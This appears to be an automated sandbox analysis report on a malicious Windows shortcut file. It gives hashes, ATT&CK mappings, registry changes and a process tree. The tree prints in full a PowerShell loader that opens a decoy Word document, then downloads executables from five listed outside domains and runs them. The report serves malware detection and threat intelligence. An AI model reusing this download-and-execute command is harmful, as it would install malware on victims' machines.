18d77d07d2526660da13ca7c62925458360630a526b939f6eab32cc3233659a1

General

Target

105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk
Size

2KB
MD5

105e49bf1a9ac6a8f095ca1e9dfa5958
SHA1

ec9174ecb7de3a9ff2005dc726f4629e645d89d1
SHA256

18d77d07d2526660da13ca7c62925458360630a526b939f6eab32cc3233659a1
SHA512

194d0f1d6cb6f7069b5684f2a977134c3c8f82e29b3cd0d09f34213f1473f5a297e6593c3fb2775789038204203d1028ae47272d46ea3d929b01d9cdc498ac32

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 6 IoCs

flow	pid	Process
5	2904	powershell.exe
6	2904	powershell.exe
7	2904	powershell.exe
9	2904	powershell.exe
11	2904	powershell.exe
12	2904	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2904	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2552	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2904	powershell.exe
2904	powershell.exe
2904	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2904	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2552	WINWORD.EXE
2552	WINWORD.EXE
2552	WINWORD.EXE
2552	WINWORD.EXE
2552	WINWORD.EXE
2552	WINWORD.EXE
2552	WINWORD.EXE

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 1136 wrote to memory of 2904	1136	cmd.exe	29
PID 1136 wrote to memory of 2904	1136	cmd.exe	29
PID 1136 wrote to memory of 2904	1136	cmd.exe	29
PID 2904 wrote to memory of 2552	2904	powershell.exe	30
PID 2904 wrote to memory of 2552	2904	powershell.exe	30
PID 2904 wrote to memory of 2552	2904	powershell.exe	30
PID 2904 wrote to memory of 2552	2904	powershell.exe	30

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -NoProfile -command function goe { return New-Object System.Net.WebClient; }; $rnd = New-Object System.Random; $ld = 0; $cs = [char]92; $fn = $env:temp+$cs; $ll = 'actual-clinic.ru','custommaidbooks.com','pinkcamille.com','locksmithtaunton.net','helpdeskng.com'; $dc = $fn+'a.doc'; $lk = $fn+'a.txt'; $y = goe; function g($f) { Start $f; }; $c = ''; if (!(Test-Path $dc)) { for ($i=0; $i -lt 2000; $i++) { $c = $c + [char]$rnd.Next(1,255); }; $c | Out-File -FilePath $dc; }; g($dc); if (!(Test-Path $lk)) { New-Item -Path $fn -Name 'a.txt' -ItemType File; for($n=1; $n -le 2; $n++) { $gop = '/counter/?TZWajRSsfqVvY6jmjdd_QLm_5Y3oJ6kfm3XxsQkTmKkZHf6ZWl0Ozg2PggWE7WOxbIY3mPYQ9s4L3iLQaEVBvAEo4B4'+$n; $f = $fn+'a'+$n+'.exe'; for($i=$ld; $i -lt $ll.length; $i++) { $u = $ll[$i] + $gop; $u = 'http://' + $u; $y.DownloadFile($u, $f); if (Test-Path $f) { $var = Get-Item $f; if ($var.length -gt 10000) { g($f); $ld=$i; break; }; }; }; }; };notepad.exe
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2904
- - C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a.doc"
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    PID:2552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\a.doc

Filesize
3KB

MD5
259d4d0838b6e0df6374c5c81d213f54

SHA1
7d24482a10d90e71a275f42a92987879042c428f

SHA256
e7b3fbcacb8348b511ab51c48727f0c5d448185a2cbb84e7485b67f1efff24ae

SHA512
c540fbd80875d6538182152ad23afb25bb2c35eb3aacd28e28872b8f6584dbfc8372c1a0e3325a8fca79ad99972b0193197821d039a28eab721f7b2eeab2c6bc

Download Submit
memory/2552-46-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2904-38-0x000007FEF4D5E000-0x000007FEF4D5F000-memory.dmp

Filesize
4KB

Download
memory/2904-39-0x000000001B160000-0x000000001B442000-memory.dmp

Filesize
2.9MB

Download
memory/2904-40-0x0000000002740000-0x0000000002748000-memory.dmp

Filesize
32KB

Download
memory/2904-41-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

Filesize
9.6MB

Download
memory/2904-43-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

Filesize
9.6MB

Download
memory/2904-44-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

Filesize
9.6MB

Download
memory/2904-45-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

Filesize
9.6MB

Download
memory/2904-56-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing